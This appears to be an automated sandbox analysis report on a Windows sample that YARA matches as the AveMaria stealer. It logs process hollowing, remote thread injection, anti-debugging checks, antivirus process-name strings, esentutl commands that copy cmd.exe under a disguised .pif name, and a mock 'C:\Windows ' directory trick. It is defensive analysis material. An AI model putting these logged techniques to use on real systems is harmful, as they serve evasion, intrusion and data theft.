Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\Public\Libraries\kwtqutrL.pif Last function: Thread delayed
Source: C:\Users\Public\xpha.pif Last function: Thread delayed
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Code function: 0_2_02F15908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA, 0_2_02F15908
Source: C:\Users\Public\alpha.pif Code function: 8_2_00530207 FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove, 8_2_00530207
Source: C:\Users\Public\alpha.pif Code function: 8_2_0053589A FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose, 8_2_0053589A
Source: C:\Users\Public\alpha.pif Code function: 8_2_00543E66 FindFirstFileW,FindNextFileW,FindClose, 8_2_00543E66
Source: C:\Users\Public\alpha.pif Code function: 8_2_00534EC1 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW, 8_2_00534EC1
Source: C:\Users\Public\alpha.pif Code function: 8_2_0052532E GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,??_V@YAXPAX@Z,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose, 8_2_0052532E
Source: C:\Users\Public\Libraries\kwtqutrL.pif Code function: 10_2_0040C293 GetFullPathNameA,PathCombineA,PathCombineA,FindFirstFileA,PathCombineA,PathCombineA,FindNextFileA, 10_2_0040C293
Source: C:\Users\Public\Libraries\kwtqutrL.pif Code function: 10_2_00413C83 FindFirstFileW,lstrlenW,lstrcpyW,FindNextFileW, 10_2_00413C83
Source: C:\Users\Public\alpha.pif Code function: 12_2_0053589A FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose, 12_2_0053589A
Source: C:\Users\Public\alpha.pif Code function: 12_2_00530207 FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove, 12_2_00530207
Source: C:\Users\Public\alpha.pif Code function: 12_2_00543E66 FindFirstFileW,FindNextFileW,FindClose, 12_2_00543E66
Source: C:\Users\Public\alpha.pif Code function: 12_2_00534EC1 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW, 12_2_00534EC1
Source: C:\Users\Public\alpha.pif Code function: 12_2_0052532E GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,??_V@YAXPAX@Z,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose, 12_2_0052532E
Source: C:\Users\Public\Libraries\kwtqutrL.pif Code function: 21_2_0040C293 GetFullPathNameA,PathCombineA,PathCombineA,FindFirstFileA,PathCombineA,PathCombineA,FindNextFileA, 21_2_0040C293
Source: C:\Users\Public\Libraries\kwtqutrL.pif Code function: 21_2_00413C83 FindFirstFileW,lstrlenW,lstrcpyW,FindNextFileW, 21_2_00413C83
Source: C:\Users\Public\Libraries\kwtqutrL.pif Code function: 10_2_00413DA4 GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetDriveTypeW,lstrlenW,lstrcpyW,lstrlenW, 10_2_00413DA4
Source: kwtqutrL.pif, 00000017.00000003.2635265944.000000002F9A4000.00000004.00000020.00020000.00000000.sdmp, kwtqutrL.pif, 00000017.00000003.2635393921.000000002F9A5000.00000004.00000020.00020000.00000000.sdmp, kwtqutrL.pif, 00000017.00000003.2634907039.000000002F9A4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllV
Source: kwtqutrL.pif, 00000015.00000003.2573026020.000000002DB74000.00000004.00000020.00020000.00000000.sdmp, kwtqutrL.pif, 00000015.00000003.2566417394.000000002DB74000.00000004.00000020.00020000.00000000.sdmp, kwtqutrL.pif, 00000015.00000002.2601527564.000000002DB77000.00000004.00000020.00020000.00000000.sdmp, kwtqutrL.pif, 00000015.00000003.2575229762.000000002DB75000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllE
Source: qqig1mHX8U.exe, 00000000.00000002.2401737655.0000000000571000.00000004.00000020.00020000.00000000.sdmp, qqig1mHX8U.exe, 00000000.00000002.2401737655.0000000000585000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: qqig1mHX8U.exe, 00000000.00000002.2401737655.0000000000585000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWz>
Source: kwtqutrL.pif, 0000000A.00000003.2423107004.0000000021155000.00000004.00000020.00020000.00000000.sdmp, kwtqutrL.pif, 0000000A.00000003.2424419773.0000000021151000.00000004.00000020.00020000.00000000.sdmp, kwtqutrL.pif, 0000000A.00000002.3561811344.000000002115A000.00000004.00000020.00020000.00000000.sdmp, kwtqutrL.pif, 0000000A.00000003.2424507506.000000002115A000.00000004.00000020.00020000.00000000.sdmp, kwtqutrL.pif, 0000000A.00000003.2424394229.000000002115A000.00000004.00000020.00020000.00000000.sdmp, xpha.pif, 0000000D.00000002.2508985745.0000000000660000.00000004.00000020.00020000.00000000.sdmp, Lrtuqtwk.PIF, 00000016.00000002.2615739994.0000000000808000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Lrtuqtwk.PIF, 00000013.00000002.2538540506.000000000063D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllc
Source: C:\Users\user\Desktop\qqig1mHX8U.exe API call chain: ExitProcess graph end node
Source: C:\Users\Public\Libraries\kwtqutrL.pif API call chain: ExitProcess graph end node
Source: C:\Users\Public\Libraries\kwtqutrL.pif API call chain: ExitProcess graph end node
Source: C:\Users\Public\Libraries\Lrtuqtwk.PIF API call chain: ExitProcess graph end node
Source: C:\Users\Public\Libraries\kwtqutrL.pif API call chain: ExitProcess graph end node
Source: C:\Users\Public\Libraries\kwtqutrL.pif API call chain: ExitProcess graph end node
Source: C:\Users\Public\Libraries\kwtqutrL.pif API call chain: ExitProcess graph end node
Source: C:\Users\Public\Libraries\Lrtuqtwk.PIF API call chain: ExitProcess graph end node

Anti Debugging
barindex
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Code function: 0_2_02F2F744 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent, 0_2_02F2F744
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\Public\Libraries\Lrtuqtwk.PIF Process queried: DebugPort Jump to behavior
Source: C:\Users\Public\Libraries\Lrtuqtwk.PIF Process queried: DebugPort
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\Public\alpha.pif Code function: 8_2_00542E37 IsDebuggerPresent, 8_2_00542E37
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Code function: 0_2_02F2894C LoadLibraryW,GetProcAddress,FreeLibrary, 0_2_02F2894C
Contains functionality to read the PEB
Source: C:\Users\Public\alpha.pif Code function: 8_2_0054C1FA mov eax, dword ptr fs:[00000030h] 8_2_0054C1FA
Source: C:\Users\Public\Libraries\kwtqutrL.pif Code function: 10_2_0041E172 mov eax, dword ptr fs:[00000030h] 10_2_0041E172
Source: C:\Users\Public\Libraries\kwtqutrL.pif Code function: 10_2_004143ED mov eax, dword ptr fs:[00000030h] 10_2_004143ED
Source: C:\Users\Public\Libraries\kwtqutrL.pif Code function: 10_2_004143F4 mov eax, dword ptr fs:[00000030h] 10_2_004143F4
Source: C:\Users\Public\Libraries\kwtqutrL.pif Code function: 10_2_0041471F mov eax, dword ptr fs:[00000030h] 10_2_0041471F
Source: C:\Users\Public\alpha.pif Code function: 12_2_0054C1FA mov eax, dword ptr fs:[00000030h] 12_2_0054C1FA
Source: C:\Users\Public\Libraries\kwtqutrL.pif Code function: 21_2_0041E172 mov eax, dword ptr fs:[00000030h] 21_2_0041E172
Source: C:\Users\Public\Libraries\kwtqutrL.pif Code function: 21_2_004143ED mov eax, dword ptr fs:[00000030h] 21_2_004143ED
Source: C:\Users\Public\Libraries\kwtqutrL.pif Code function: 21_2_004143F4 mov eax, dword ptr fs:[00000030h] 21_2_004143F4
Source: C:\Users\Public\Libraries\kwtqutrL.pif Code function: 21_2_0041471F mov eax, dword ptr fs:[00000030h] 21_2_0041471F
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\Public\alpha.pif Code function: 8_2_0052A9D4 GetEnvironmentStringsW,GetProcessHeap,RtlAllocateHeap,memcpy,FreeEnvironmentStringsW, 8_2_0052A9D4
Source: C:\Users\Public\alpha.pif Code function: 8_2_00536EC0 SetUnhandledExceptionFilter, 8_2_00536EC0
Source: C:\Users\Public\alpha.pif Code function: 8_2_00536B40 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 8_2_00536B40
Source: C:\Users\Public\alpha.pif Code function: 12_2_00536EC0 SetUnhandledExceptionFilter, 12_2_00536EC0
Source: C:\Users\Public\alpha.pif Code function: 12_2_00536B40 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 12_2_00536B40
Source: C:\Users\Public\xpha.pif Code function: 13_2_00D43470 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 13_2_00D43470
Source: C:\Users\Public\xpha.pif Code function: 13_2_00D43600 SetUnhandledExceptionFilter, 13_2_00D43600

HIPS / PFW / Operating System Protection Evasion
barindex
Allocates memory in foreign processes
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Memory allocated: C:\Users\Public\Libraries\kwtqutrL.pif base: 400000 protect: page execute and read and write Jump to behavior
Source: C:\Users\Public\Libraries\Lrtuqtwk.PIF Memory allocated: C:\Users\Public\Libraries\kwtqutrL.pif base: 400000 protect: page execute and read and write Jump to behavior
Source: C:\Users\Public\Libraries\Lrtuqtwk.PIF Memory allocated: C:\Users\Public\Libraries\kwtqutrL.pif base: 400000 protect: page execute and read and write
Contains functionality to inject threads in other processes
Source: C:\Users\Public\Libraries\kwtqutrL.pif Code function: 10_2_00409BFF OpenProcess,VirtualAllocEx,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,CreateRemoteThread, 10_2_00409BFF
Source: C:\Users\Public\Libraries\kwtqutrL.pif Code function: 10_2_00415FE0 RegSetValueExA,OpenProcess,GetCurrentProcessId,EntryPoint,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,RegSetValueExA,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread, 10_2_00415FE0
Source: C:\Users\Public\Libraries\kwtqutrL.pif Code function: 21_2_00409BFF OpenProcess,VirtualAllocEx,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,CreateRemoteThread, 21_2_00409BFF
Source: C:\Users\Public\Libraries\kwtqutrL.pif Code function: 21_2_00415FE0 RegSetValueExA,OpenProcess,GetCurrentProcessId,EntryPoint,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,RegSetValueExA,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread, 21_2_00415FE0
Drops or copies cmd.exe with a different name (likely to bypass HIPS)
Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\alpha.pif Jump to dropped file
Sample uses process hollowing technique
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Section unmapped: C:\Users\Public\Libraries\kwtqutrL.pif base address: 400000 Jump to behavior
Source: C:\Users\Public\Libraries\Lrtuqtwk.PIF Section unmapped: C:\Users\Public\Libraries\kwtqutrL.pif base address: 400000 Jump to behavior
Source: C:\Users\Public\Libraries\Lrtuqtwk.PIF Section unmapped: C:\Windows\SysWOW64\esentutl.exe base address: 400000
Writes to foreign memory regions
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Memory written: C:\Users\Public\Libraries\kwtqutrL.pif base: 24A008 Jump to behavior
Source: C:\Users\Public\Libraries\Lrtuqtwk.PIF Memory written: C:\Users\Public\Libraries\kwtqutrL.pif base: 3E0008 Jump to behavior
Source: C:\Users\Public\Libraries\Lrtuqtwk.PIF Memory written: C:\Users\Public\Libraries\kwtqutrL.pif base: 289008
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Source: C:\Users\Public\Libraries\kwtqutrL.pif Code function: RegSetValueExA,CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle, explorer.exe 10_2_004160C3
Source: C:\Users\Public\Libraries\kwtqutrL.pif Code function: RegSetValueExA,CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle, explorer.exe 21_2_004160C3
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Process created: C:\Users\Public\Libraries\kwtqutrL.pif C:\Users\Public\Libraries\kwtqutrL.pif Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows " Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c del "C:\Users\Public\xpha.pif" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \SysWOW64 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \" Jump to behavior
Source: C:\Users\Public\alpha.pif Process created: C:\Users\Public\xpha.pif C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10 Jump to behavior
Source: C:\Users\Public\Libraries\Lrtuqtwk.PIF Process created: C:\Users\Public\Libraries\kwtqutrL.pif C:\Users\Public\Libraries\kwtqutrL.pif Jump to behavior
Source: C:\Users\Public\Libraries\Lrtuqtwk.PIF Process created: C:\Users\Public\Libraries\kwtqutrL.pif C:\Users\Public\Libraries\kwtqutrL.pif
Source: C:\Users\Public\Libraries\kwtqutrL.pif Code function: 10_2_00415774 CharLowerW,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,RegCreateKeyExA,RegCloseKey,SetLastError, 10_2_00415774
Source: C:\Users\Public\Libraries\kwtqutrL.pif Code function: 10_2_00413248 AllocateAndInitializeSid,LookupAccountSidW,GetLastError,FreeSid, 10_2_00413248
Contains functionality to query CPU information (cpuid)
Source: C:\Users\Public\Libraries\kwtqutrL.pif Code function: 10_2_004135D1 cpuid 10_2_004135D1
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA, 0_2_02F15ACC
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Code function: GetLocaleInfoA, 0_2_02F1A7C4
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Code function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA, 0_2_02F15BD8
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Code function: GetLocaleInfoA, 0_2_02F1A810
Source: C:\Users\Public\alpha.pif Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale, 8_2_00528572
Source: C:\Users\Public\alpha.pif Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,GetDateFormatW,memmove,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,GetLastError,realloc, 8_2_00526854
Source: C:\Users\Public\alpha.pif Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW, 8_2_00529310
Source: C:\Users\Public\alpha.pif Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale, 12_2_00528572
Source: C:\Users\Public\alpha.pif Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,GetDateFormatW,memmove,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,GetLastError,realloc, 12_2_00526854
Source: C:\Users\Public\alpha.pif Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW, 12_2_00529310
Source: C:\Users\Public\Libraries\Lrtuqtwk.PIF Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 19_2_02DC5ACC
Source: C:\Users\Public\Libraries\Lrtuqtwk.PIF Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 19_2_02DC5BD7
Source: C:\Users\Public\Libraries\Lrtuqtwk.PIF Code function: GetLocaleInfoA, 19_2_02DCA810
Source: C:\Users\Public\Libraries\Lrtuqtwk.PIF Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 22_2_02EA5ACC
Source: C:\Users\Public\Libraries\Lrtuqtwk.PIF Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 22_2_02EA5BD7
Source: C:\Users\Public\Libraries\Lrtuqtwk.PIF Code function: GetLocaleInfoA, 22_2_02EAA810
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\Public\alpha.pif Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Code function: 0_2_02F1920C GetLocalTime, 0_2_02F1920C
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Code function: 0_2_02F1B78C GetVersionExA, 0_2_02F1B78C
Source: C:\Users\Public\Libraries\Lrtuqtwk.PIF Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings
barindex
Increases the number of concurrent connection per server for Internet Explorer
Source: C:\Users\Public\Libraries\kwtqutrL.pif Registry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings MaxConnectionsPerServer 10 Jump to behavior
AV process strings found (often used to terminate AV products)
Source: qqig1mHX8U.exe, 00000000.00000002.2442484350.000000007F1C0000.00000004.00001000.00020000.00000000.sdmp, qqig1mHX8U.exe, 00000000.00000003.2374914928.000000007EFA0000.00000004.00001000.00020000.00000000.sdmp, kwtqutrL.pif, 0000000A.00000002.3547503805.00000000007D0000.00000040.00000400.00020000.00000000.sdmp, kwtqutrL.pif, 0000000A.00000001.2400116274.0000000000560000.00000040.00000001.00020000.00000000.sdmp, kwtqutrL.pif, 00000015.00000002.2575772053.0000000000710000.00000040.00000400.00020000.00000000.sdmp, kwtqutrL.pif, 00000015.00000001.2536364319.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, kwtqutrL.pif, 00000017.00000001.2613500142.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, kwtqutrL.pif, 00000017.00000001.2613500142.0000000000710000.00000040.00000001.00020000.00000000.sdmp Binary or memory string: cmdagent.exe
Source: qqig1mHX8U.exe, 00000000.00000002.2442484350.000000007F1C0000.00000004.00001000.00020000.00000000.sdmp, qqig1mHX8U.exe, 00000000.00000003.2374914928.000000007EFA0000.00000004.00001000.00020000.00000000.sdmp, kwtqutrL.pif, 0000000A.00000002.3547503805.00000000007D0000.00000040.00000400.00020000.00000000.sdmp, kwtqutrL.pif, 0000000A.00000001.2400116274.0000000000560000.00000040.00000001.00020000.00000000.sdmp, kwtqutrL.pif, 00000015.00000002.2575772053.0000000000710000.00000040.00000400.00020000.00000000.sdmp, kwtqutrL.pif, 00000015.00000001.2536364319.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, kwtqutrL.pif, 00000017.00000001.2613500142.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, kwtqutrL.pif, 00000017.00000001.2613500142.0000000000710000.00000040.00000001.00020000.00000000.sdmp Binary or memory string: quhlpsvc.exe
Source: qqig1mHX8U.exe, 00000000.00000002.2442484350.000000007F1C0000.00000004.00001000.00020000.00000000.sdmp, qqig1mHX8U.exe, 00000000.00000003.2374914928.000000007EFA0000.00000004.00001000.00020000.00000000.sdmp, kwtqutrL.pif, 0000000A.00000002.3547503805.00000000007D0000.00000040.00000400.00020000.00000000.sdmp, kwtqutrL.pif, 0000000A.00000001.2400116274.0000000000560000.00000040.00000001.00020000.00000000.sdmp, kwtqutrL.pif, 00000015.00000002.2575772053.0000000000710000.00000040.00000400.00020000.00000000.sdmp, kwtqutrL.pif, 00000015.00000001.2536364319.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, kwtqutrL.pif, 00000017.00000001.2613500142.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, kwtqutrL.pif, 00000017.00000001.2613500142.0000000000710000.00000040.00000001.00020000.00000000.sdmp Binary or memory string: avgamsvr.exe
Source: qqig1mHX8U.exe, 00000000.00000002.2442484350.000000007F1C0000.00000004.00001000.00020000.00000000.sdmp, qqig1mHX8U.exe, 00000000.00000003.2374914928.000000007EFA0000.00000004.00001000.00020000.00000000.sdmp, kwtqutrL.pif, 0000000A.00000002.3547503805.00000000007D0000.00000040.00000400.00020000.00000000.sdmp, kwtqutrL.pif, 0000000A.00000001.2400116274.0000000000560000.00000040.00000001.00020000.00000000.sdmp, kwtqutrL.pif, 00000015.00000002.2575772053.0000000000710000.00000040.00000400.00020000.00000000.sdmp, kwtqutrL.pif, 00000015.00000001.2536364319.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, kwtqutrL.pif, 00000017.00000001.2613500142.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, kwtqutrL.pif, 00000017.00000001.2613500142.0000000000710000.00000040.00000001.00020000.00000000.sdmp Binary or memory string: TMBMSRV.exe
Source: qqig1mHX8U.exe, 00000000.00000002.2442484350.000000007F1C0000.00000004.00001000.00020000.00000000.sdmp, qqig1mHX8U.exe, 00000000.00000003.2374914928.000000007EFA0000.00000004.00001000.00020000.00000000.sdmp, kwtqutrL.pif, 0000000A.00000002.3547503805.00000000007D0000.00000040.00000400.00020000.00000000.sdmp, kwtqutrL.pif, 0000000A.00000001.2400116274.0000000000560000.00000040.00000001.00020000.00000000.sdmp, kwtqutrL.pif, 00000015.00000002.2575772053.0000000000710000.00000040.00000400.00020000.00000000.sdmp, kwtqutrL.pif, 00000015.00000001.2536364319.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, kwtqutrL.pif, 00000017.00000001.2613500142.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, kwtqutrL.pif, 00000017.00000001.2613500142.0000000000710000.00000040.00000001.00020000.00000000.sdmp Binary or memory string: Vsserv.exe
Source: qqig1mHX8U.exe, 00000000.00000002.2442484350.000000007F1C0000.00000004.00001000.00020000.00000000.sdmp, qqig1mHX8U.exe, 00000000.00000003.2374914928.000000007EFA0000.00000004.00001000.00020000.00000000.sdmp, kwtqutrL.pif, 0000000A.00000002.3547503805.00000000007D0000.00000040.00000400.00020000.00000000.sdmp, kwtqutrL.pif, 0000000A.00000001.2400116274.0000000000560000.00000040.00000001.00020000.00000000.sdmp, kwtqutrL.pif, 00000015.00000002.2575772053.0000000000710000.00000040.00000400.00020000.00000000.sdmp, kwtqutrL.pif, 00000015.00000001.2536364319.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, kwtqutrL.pif, 00000017.00000001.2613500142.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, kwtqutrL.pif, 00000017.00000001.2613500142.0000000000710000.00000040.00000001.00020000.00000000.sdmp Binary or memory string: avgupsvc.exe
Source: qqig1mHX8U.exe, 00000000.00000002.2442484350.000000007F1C0000.00000004.00001000.00020000.00000000.sdmp, qqig1mHX8U.exe, 00000000.00000003.2374914928.000000007EFA0000.00000004.00001000.00020000.00000000.sdmp, kwtqutrL.pif, 0000000A.00000002.3547503805.00000000007D0000.00000040.00000400.00020000.00000000.sdmp, kwtqutrL.pif, 0000000A.00000001.2400116274.0000000000560000.00000040.00000001.00020000.00000000.sdmp, kwtqutrL.pif, 00000015.00000002.2575772053.0000000000710000.00000040.00000400.00020000.00000000.sdmp, kwtqutrL.pif, 00000015.00000001.2536364319.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, kwtqutrL.pif, 00000017.00000001.2613500142.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, kwtqutrL.pif, 00000017.00000001.2613500142.0000000000710000.00000040.00000001.00020000.00000000.sdmp Binary or memory string: avgemc.exe
Source: qqig1mHX8U.exe, 00000000.00000002.2442484350.000000007F1C0000.00000004.00001000.00020000.00000000.sdmp, qqig1mHX8U.exe, 00000000.00000003.2374914928.000000007EFA0000.00000004.00001000.00020000.00000000.sdmp, kwtqutrL.pif, 0000000A.00000002.3547503805.00000000007D0000.00000040.00000400.00020000.00000000.sdmp, kwtqutrL.pif, 0000000A.00000001.2400116274.0000000000560000.00000040.00000001.00020000.00000000.sdmp, kwtqutrL.pif, 00000015.00000002.2575772053.0000000000710000.00000040.00000400.00020000.00000000.sdmp, kwtqutrL.pif, 00000015.00000001.2536364319.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, kwtqutrL.pif, 00000017.00000001.2613500142.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, kwtqutrL.pif, 00000017.00000001.2613500142.0000000000710000.00000040.00000001.00020000.00000000.sdmp Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information
barindex
Yara detected AveMaria stealer
Source: Yara match File source: 10.3.kwtqutrL.pif.21165028.0.raw.unpack, type: UNPACKEDPE
